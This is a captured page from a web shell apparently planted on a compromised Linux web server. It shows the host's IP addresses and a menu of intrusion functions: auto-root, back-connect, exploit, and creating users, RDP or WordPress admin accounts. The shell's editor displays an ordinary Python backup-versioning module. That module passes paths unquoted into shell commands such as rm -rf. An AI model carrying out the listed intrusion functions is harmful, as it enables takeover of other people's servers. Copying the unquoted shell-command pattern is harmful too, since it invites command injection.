Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.16.44.204
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
mod /
base /
backup_tool /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
5.53
KB
-rw-r--r--
util.py
1.41
KB
-rw-r--r--
versions_tool.py
9.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : versions_tool.py
import json import os import shutil import tarfile import time from hashlib import md5 from typing import Optional, List, Union, Dict, Any from .util import DB, ExecShell, write_file, write_log, read_file class VersionTool: _config_file = "/www/server/panel/data/version_config.json" def __init__(self): self._config: Optional[Dict[str, List[Dict[str, Any]]]] = None self._pack_class = BasePack self.pack_path = "/www/backup/versions" if not os.path.isdir(self.pack_path): os.makedirs(self.pack_path) @property def config(self) -> Dict[str, List[Dict[str, Any]]]: if self._config is not None: return self._config data = {} try: res = read_file(self._config_file) if isinstance(res, str): data = json.loads(res) except (json.JSONDecoder, TypeError, ValueError): pass self._config = data return self._config def save_config(self): if self._config is not None: write_file(self._config_file, json.dumps(self._config)) def add_to_config(self, data: dict): project_name = data.get("project_name") self._config = None if project_name not in self.config: self.config[project_name] = [] self.config[project_name].append(data) self.save_config() def set_pack_class(self, pack_cls): self._pack_class = pack_cls def version_list(self, project_name: str): if project_name in self.config: return self.config[project_name] return [] def get_version_info(self, project_name: str, version: str) -> Optional[dict]: if project_name in self.config: for i in self.config[project_name]: if i.get("version") == version: return i return None # 把某个路径下的文件打包并发布为一个版本 def publish_by_src_path(self, project_name: str, # 名称 src_path: str, # 源路径 version: str, # 版本号 ps: Optional[str] = None, # 备注 other: Optional[dict] = None, # 其他信息 sync: bool = False, # 是否同步执行 ): if project_name in self.config: for i in self.config[project_name]: if i["version"] == version: return "The current version already exists" if not os.path.isdir(src_path): return "The source path does not exist" if ps is None: ps = '' if other is None: other = {} zip_name = "{}_{}.tar.gz".format( os.path.basename(src_path), time.strftime('%Y%m%d_%H%M%S', time.localtime()) ) data = { "project_name": project_name, "version": version, "ps": ps, "other": other, "zip_name": zip_name, "backup_time": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()) } return self._pack_class(src_path, self.pack_path, zip_name, sync=sync, vt=self, data=data)(**other) def recover(self, project_name: str, # 名称 version: str, # 版本 target_path: str, # 目标路径 run_path=None ): if not run_path: run_path = target_path if project_name not in self.config: return 'The project does not exist' target = None for i in self.config[project_name]: if i["version"] == version: target = i break if target is None: return 'Version does not exist' file = os.path.join(self.pack_path, target["zip_name"]) if not os.path.exists(file): return 'Version file missing' tmp_path = '/tmp/version_{}'.format(int(time.time())) tar = tarfile.open(file, mode='r') tar.extractall(tmp_path) user_data = None if os.path.exists(target_path): ExecShell("chattr -i -R {}/".format(target_path)) user_data = read_file(run_path + "/.user.ini") ExecShell("rm -rf {}".format(target_path)) os.makedirs(target_path) if not os.path.exists(target_path): os.makedirs(target_path) ExecShell(r"\cp -rf {}/* {}".format(tmp_path, target_path)) if user_data: write_file(target_path + "/.user.ini", run_path) ExecShell("chattr +i {}/.user.ini".format(run_path)) ExecShell("rm -rf {}".format(tmp_path)) return True def publish_by_file(self, project_name: str, # 名称 src_file: str, # 源路径 version: str, # 版本号 ps: Optional[str] = None, # 备注 other: Optional[dict] = None, # 其他信息 ): if project_name in self.config: for i in self.config[project_name]: if i["version"] == version: return "The current version already exists" if not os.path.isfile(src_file): return "The source path does not exist" if ps is None: ps = '' if other is None: other = {} zip_name = os.path.basename(src_file) data = { "project_name": project_name, "version": version, "ps": ps, "other": other, "zip_name": zip_name, "backup_time": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()) } try: shutil.copy(src_file, self.pack_path + "/" + zip_name) except: return "File save failed" self.add_to_config(data) return None def remove(self, project_name: str, # 名称 version: str, # 版本 ) -> Optional[str]: if project_name not in self.config: return 'The project does not exist' target = None for i in self.config[project_name]: if i["version"] == version: target = i break if target is None: return 'Version does not exist' file = os.path.join(self.pack_path, target["zip_name"]) if os.path.isfile(file): os.remove(file) self.config[project_name].remove(target) self.save_config() return None def set_ps(self, name: str, version: str, ps: str): [i.update({'ps': ps}) for i in self.config[name] if i["version"] == version] self.save_config() return True class BasePack: exec_log_file = "/tmp/project_pack.log" def __init__(self, src_path, target_path, zip_name, sync=False, vt: VersionTool = None, data: dict = None): self.src_path = src_path self.target_path = target_path self.zip_name = zip_name self.sync = sync self.v = vt self._add_data = data def save_config(self): self.v.add_to_config(self._add_data) def __call__(self, *args, **kwargs) -> Optional[str]: if not os.path.exists(self.src_path): return "The source path does not exist" target_path = "/www/backup/versions" if not os.path.isdir(target_path): os.makedirs(target_path) if self.sync: return self._sync_backup(self.src_path, target_path, self.zip_name) else: return self._async_backup(self.src_path, target_path, self.zip_name) def _sync_backup(self, src: str, target_path: str, zip_name: str) -> Optional[str]: try: write_file(self.exec_log_file, "") execStr = ("cd {} && " "tar -zcvf '{}' --exclude=.user.ini ./ 2>&1 > {} \n" "echo '---The packaging execution is complete---' >> {}" ).format(src, os.path.join(target_path, zip_name), self.exec_log_file, self.exec_log_file) ExecShell(execStr) self.save_config() except: return "The packaging execution failed" def _async_backup(self, src: str, target_path: str, zip_name: str): import threading hash_name = self._hash_src_name(src) backup_tip_path = "/tmp/mod_version_tip" if os.path.exists(backup_tip_path): os.makedirs(backup_tip_path) tip_file = os.path.join(backup_tip_path, hash_name) if os.path.isfile(tip_file): mtime = os.stat(tip_file).st_mtime if time.time() - mtime > 60 * 20: # 20 分钟未执行,认为出现在不可抗力,导致备份失败,允许再次备份 os.remove(tip_file) else: return "Packing is in progress, please do not proceed" write_file(tip_file, "") def _back_p(): try: write_file(self.exec_log_file, "") execStr = ("cd {} && " "tar -zcvf '{}' --exclude=.user.ini ./ 2>&1 > {} \n" "echo '---Backup execution completed---' >> {}" ).format(src, os.path.join(target_path, zip_name), self.exec_log_file, self.exec_log_file) ExecShell(execStr) self.save_config() except: pass finally: if os.path.exists(tip_file): os.remove(tip_file) t = threading.Thread(target=_back_p) t.start() @staticmethod def _hash_src_name(name: Union[str, bytes]) -> str: if isinstance(name, str): name = name.encode('utf-8') md5_obj = md5() md5_obj.update(name) return md5_obj.hexdigest()
Close